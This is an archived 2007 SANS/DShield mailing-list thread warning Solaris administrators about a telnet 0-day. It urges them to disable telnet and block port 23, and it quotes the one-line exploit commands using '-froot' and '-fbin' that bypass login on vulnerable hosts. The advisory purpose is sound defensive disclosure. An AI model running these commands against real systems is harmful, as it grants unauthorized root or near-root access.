[Dshield] Solaris Telnet 0-day (Important!)

Johannes B. Ullrich jullrich at sans.org
Mon Feb 12 11:41:08 GMT 2007


Gadi Evron wrote:
>>From HD Moore:
> "but this bug isnt -froot, its -fanythingbutroot =P"

agreed. -fbin seems to be the preferred way.

> 
> On Sun, 11 Feb 2007, K K wrote:
> 
>> On 2/11/07, Johannes B. Ullrich <jullrich at sans.org> wrote:
>>> If you run Solaris, please check if you got telnet enabled NOW. If you
>>> can, block port 23 at your perimeter. There is a fairly trivial Solaris
>>> telnet 0-day.
>>>
>>> telnet -l "-froot" [hostname]
>>>
>>> will give you root on many Solaris systems with default installs
>>> We are still testing. Please use our contact form at
>>> https://isc.sans.org/contact.html
>> On systems where the above fails with "Not on system console", don't
>> assume that the machine is secure, because the following does work,
>> and is one step from root:
>>
>> telnet -l "-fbin" [hostname]
>>
>> Gadi Evron <ge at linuxbox.org>  wrote:
>>> . If Solaris 10 & 11 are truly vulnerable to this bug,
>>> Sun deserves a  *swift* kick to the head.
>> The above is from my testing with Solaris 10, so get ready to start kicking...
>>
>> Kevin
>> _________________________________________
>>
>> SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
>> taught by our top rated instructors plus a huge vendor tools expo.
>> Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
>>
> 
> _________________________________________
> 
> SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> taught by our top rated instructors plus a huge vendor tools expo.
> Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
> 


-- 
---------
Johannes Ullrich                        http://isc.sans.org

SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
taught by our top rated instructors plus a huge vendor tools expo.
	Register Today! <http://www.sans.org/info/2501>
(Brochurecode: ISC)

PGP Key: https://secure.dshield.org/PGPKEYS

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 249 bytes
Desc: OpenPGP digital signature
Url : http://lists.sans.org/pipermail/list/attachments/20070212/a6de64c4/attachment.bin 


More information about the list mailing list